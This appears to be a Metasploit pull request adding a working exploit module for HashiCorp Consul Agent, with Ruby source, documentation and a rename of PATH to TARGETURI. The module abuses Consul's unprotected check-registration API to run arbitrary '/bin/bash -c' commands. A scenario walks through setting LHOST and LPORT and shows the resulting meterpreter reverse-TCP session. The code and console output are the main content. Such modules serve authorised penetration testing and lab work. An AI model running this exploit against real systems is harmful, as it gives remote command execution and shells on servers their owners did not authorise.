### PR TITLE
Added Consul Agent module to exploits check scripts

### DIFF
--- a/documentation/modules/exploit/multi/misc/consul_agent.md
+++ b/documentation/modules/exploit/multi/misc/consul_agent.md
@@ -1,0 +1,74 @@
+Hashicorp Consul Agent is serving a REST API which can be used to execute scripts on a regular basis.
+By default, this endpoint is not protected and anyone can add his own command line.
+
+## Vulnerable application
+
+Grab the Consul prebuilt binary [here](https://www.consul.io/downloads.html) and run the binary in dev mode with check scripts enabled:
+```
+$ ./consul agent -dev -enable-script-checks
+```
+
+This is sufficient to test the module.
+
+## Verification Steps
+
+
+Confirm that check functionality works:
+- [ ] Start Consul Agent without the check scripts enabled: `./consul agent -dev`
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/misc/consul_agent`
+- [ ] Set the `RHOST`.
+- [ ] Confirm the target is *not* vulnerable: `check`
+- [ ] Observe that the target is *not* vulnerable: `The target is not exploitable`
+- [ ] Restart Consul Agent with the check scripts enabled: `./consul agent -dev -enable-script-checks`
+- [ ] Confirm the target is vulnerable: `check`
+- [ ] Confirm that the target is vulnerable: `The target is vulnerable.`
+
+Confirm that command execution functionality works:
+- [ ] Set a payload: `set payload linux/x86/meterpreter/reverse_tcp`
+- [ ] Set `LHOST` and `LPORT`
+- [ ] Run the exploit: `run`
+- [ ] Confirm you have now a meterpreter session
+
+## Options
+
+**PATH**
+
+The path to the Consult REST API. By default, the path is `/`.
+
+**ACL_TOKEN**
+
+If the API is protected by a token and you have this token, you can set its value to make the REST API calls work.
+
+
+## Scenarios
+
+### Meterpreter reverse tcp
+
+In this example, the Consul instance is protected by an *ACL token*:
+```
+msf5 > use exploit/multi/misc/consul_agent 
+msf5 exploit(multi/misc/consul_agent) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+msf5 exploit(multi/misc/consul_agent) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(multi/misc/consul_agent) > set LPORT 12345
+LPORT => 12345
+msf5 exploit(multi/misc/consul_agent) > set ACL_TOKEN FBAF54CC-E03D-4763-9F19-376114D3857B
+ACL_TOKEN => FBAF54CC-E03D-4763-9F19-376114D3857B
+msf5 exploit(multi/misc/consul_agent) > check 
+[+] 192.168.56.101:8500 The target is vulnerable.
+msf5 exploit(multi/misc/consul_agent) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:12345 
+[+] The shell is on the way!
+[*] Command Stager progress - 100.00% done (763/763 bytes)
+[*] Sending stage (861480 bytes) to 192.168.56.101
+
+meterpreter > sysinfo 
+Computer     : 192.168.56.101
+OS           : Debian 9.4 (Linux 4.9.0-6-amd64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+```

--- a/documentation/modules/exploit/multi/misc/consul_agent.md
+++ b/documentation/modules/exploit/multi/misc/consul_agent.md
@@ -1,5 +1,5 @@
 Hashicorp Consul Agent is serving a REST API which can be used to execute scripts on a regular basis.
-By default, this endpoint is not protected and anyone can add his own command line.
+By default, this endpoint is not protected and anyone can add their own command line.
 
 ## Vulnerable application
 
@@ -32,7 +32,7 @@ Confirm that command execution functionality works:
 
 ## Options
 
-**PATH**
+**TARGETURI**
 
 The path to the Consult REST API. By default, the path is `/`.
 

--- a/modules/exploits/multi/misc/consul_agent.rb
+++ b/modules/exploits/multi/misc/consul_agent.rb
@@ -1,0 +1,133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Consul Agent check script execution',
+      'Description'     => %q{
+        Consul Agent can allow to execute checks regularly. These checks are actually command line.
+        By default, the REST API is not protected and anybody can push new checks.
+        If the REST API is protected, a token is needed to push new checks.
+        See https://www.consul.io/api/agent/check.html for the complete documentation.
+      },
+      'Author'          => [ 'Julien Legras <julien.legras@synacktiv.com>'],
+      'License'         => MSF_LICENSE,
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Aug 31 2018',
+      'Platform'        => 'linux',
+      'Targets'         => [ [ 'Linux', {} ] ],
+      'DefaultTarget'   => 0))
+
+    register_options([
+      OptString.new('PATH', [true, "The PATH where the Consul Agent API is located", "/"]),
+      OptString.new('CHECK_NAME', [true, "The Consul Agent check name", rand_text_alphanumeric(20)]),
+      OptString.new('ACL_TOKEN', [false, "The Consul Agent ACL token (called acl_master_token)", ""]),
+      Opt::RPORT(8500)
+    ])
+  end
+
+  def register_check(name: datastore['CHECK_NAME'], shell: "/bin/bash", args: [], interval: "1s", timeout: "86400s")
+    response = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(datastore['PATH'], "/v1/agent/self"),
+      'headers'   => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+
+    use_new_api = true
+    if response and response.code == 200
+      begin
+        agent_info = JSON.parse(response.body)
+
+        use_new_api = Gem::Version.new(agent_info["Config"]["Version"]) > Gem::Version.new("1.0.0")
+      rescue JSON::ParserError
+        fail_with(Failure::Unknown, 'Failed to parse JSON output.')
+      end
+    end
+
+    data = { 'ID' => datastore['CHECK_NAME'], 'Name' => datastore['CHECK_NAME'], "Interval" => interval, "Timeout" => timeout}
+    if use_new_api
+      data.merge!({ "Shell" => shell, "Args" => args })
+    else
+      data.merge!({ "Script" => args.map { |s| '"' + s + '"' }.join(" ") })
+    end
+    response = send_request_cgi({
+      'uri'       => normalize_uri(datastore['PATH'], '/v1/agent/check/register'),
+      'method'    => 'PUT',
+      'data'      => data.to_json,
+      'headers'   => {
+        'Content-Type'   => 'application/json',
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+
+    return response
+  end
+
+  def deregister_check()
+    return send_request_cgi({
+      'uri'       => normalize_uri(datastore['PATH'], '/v1/agent/check/deregister/', datastore['CHECK_NAME']),
+      'method'    => 'PUT',
+      'headers'   => {
+        'Content-Type'   => 'application/json',
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+  end
+
+  def check
+    response = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(datastore['PATH'], "/v1/agent/self"),
+      'headers'   => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
+    })
+
+    if response and response.code == 200
+      begin
+        agent_info = JSON.parse(response.body)
+
+        return Exploit::CheckCode::Vulnerable if agent_info["DebugConfig"]["EnableScriptChecks"] == true
+        return Exploit::CheckCode::Safe
+      rescue JSON::ParserError
+        fail_with(Failure::Unknown, 'Failed to parse JSON output.')
+      end
+    end
+
+    return Exploit::CheckCode::Unknown
+  end
+
+  def on_new_session(session)
+    response = deregister_check()
+    if response and response.code != 200
+      print_error("Failed to deregister the check #{datastore['CHECK_NAME']}")
+    end
+  end
+
+
+  def execute_command(cmd, opts = {})
+    response = register_check(args: ['/bin/bash', '-c', cmd])
+
+    if response.code == 200
+      print_good("The shell is on the way!")
+    else
+      print_error("Something went wrong...")
+      print_status(response.body.to_s)
+    end
+  end
+
+  def exploit
+    execute_cmdstager()
+  end
+end
+

--- a/modules/exploits/multi/misc/consul_agent.rb
+++ b/modules/exploits/multi/misc/consul_agent.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultTarget'   => 0))
 
     register_options([
-      OptString.new('PATH', [true, "The PATH where the Consul Agent API is located", "/"]),
+      OptString.new('TARGETURI', [true, "The TARGETURI where the Consul Agent API is located", "/"]),
       OptString.new('CHECK_NAME', [true, "The Consul Agent check name", rand_text_alphanumeric(20)]),
       OptString.new('ACL_TOKEN', [false, "The Consul Agent ACL token (called acl_master_token)", ""]),
       Opt::RPORT(8500)
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def register_check(name: datastore['CHECK_NAME'], shell: "/bin/bash", args: [], interval: "1s", timeout: "86400s")
     response = send_request_cgi({
       'method'   => 'GET',
-      'uri'      => normalize_uri(datastore['PATH'], "/v1/agent/self"),
+      'uri'      => normalize_uri(datastore['TARGETURI'], "/v1/agent/self"),
       'headers'   => {
         'X-Consul-Token' => datastore['ACL_TOKEN']
       }
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
       data.merge!({ "Script" => args.map { |s| '"' + s + '"' }.join(" ") })
     end
     response = send_request_cgi({
-      'uri'       => normalize_uri(datastore['PATH'], '/v1/agent/check/register'),
+      'uri'       => normalize_uri(datastore['TARGETURI'], '/v1/agent/check/register'),
       'method'    => 'PUT',
       'data'      => data.to_json,
       'headers'   => {
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def deregister_check()
     return send_request_cgi({
-      'uri'       => normalize_uri(datastore['PATH'], '/v1/agent/check/deregister/', datastore['CHECK_NAME']),
+      'uri'       => normalize_uri(datastore['TARGETURI'], '/v1/agent/check/deregister/', datastore['CHECK_NAME']),
       'method'    => 'PUT',
       'headers'   => {
         'Content-Type'   => 'application/json',
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     response = send_request_cgi({
       'method'   => 'GET',
-      'uri'      => normalize_uri(datastore['PATH'], "/v1/agent/self"),
+      'uri'      => normalize_uri(datastore['TARGETURI'], "/v1/agent/self"),
       'headers'   => {
         'X-Consul-Token' => datastore['ACL_TOKEN']
       }


### PR DESCRIPTION
Hashicorp Consul Agent is serving a REST API which can be used to execute scripts on a regular basis.
By default, this endpoint is not protected and anyone can add his own command line.

## Vulnerable application

Grab a Consul prebuilt binary [here](https://www.consul.io/downloads.html) and run the binary in dev mode with check scripts enabled:
```
$ ./consul agent -dev -enable-script-checks
```

This is sufficient to test the module.

## Verification Steps


Confirm that check functionality works:
- [ ] Start Consul Agent without the check scripts enabled: `./consul agent -dev`
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/misc/consul_agent`
- [ ] Set the `RHOST`.
- [ ] Confirm the target is *not* vulnerable: `check`
- [ ] Observe that the target is *not* vulnerable: `The target is not exploitable`
- [ ] Restart Consul Agent with the check scripts enabled: `./consul agent -dev -enable-script-checks`
- [ ] Confirm the target is vulnerable: `check`
- [ ] Confirm that the target is vulnerable: `The target is vulnerable.`

Confirm that command execution functionality works:
- [ ] Set a payload: `set payload linux/x86/meterpreter/reverse_tcp`
- [ ] Set `LHOST` and `LPORT`
- [ ] Run the exploit: `run`
- [ ] Confirm you have now a meterpreter session

## Options

**PATH**

The path to the Consult REST API. By default, the path is `/`.

**ACL_TOKEN**

If the API is protected by a token and you have this token, you can set its value to make the REST API calls work.


## Scenarios

### Meterpreter reverse tcp

In this example, the Consul instance is protected by an *ACL token*:
```
msf5 > use exploit/multi/misc/consul_agent 
msf5 exploit(multi/misc/consul_agent) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/misc/consul_agent) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/misc/consul_agent) > set LPORT 12345
LPORT => 12345
msf5 exploit(multi/misc/consul_agent) > set ACL_TOKEN FBAF54CC-E03D-4763-9F19-376114D3857B
ACL_TOKEN => FBAF54CC-E03D-4763-9F19-376114D3857B
msf5 exploit(multi/misc/consul_agent) > check 
[+] 192.168.56.101:8500 The target is vulnerable.
msf5 exploit(multi/misc/consul_agent) > run

[*] Started reverse TCP handler on 192.168.56.1:12345 
[+] The shell is on the way!
[*] Command Stager progress - 100.00% done (763/763 bytes)
[*] Sending stage (861480 bytes) to 192.168.56.101

meterpreter > sysinfo 
Computer     : 192.168.56.101
OS           : Debian 9.4 (Linux 4.9.0-6-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```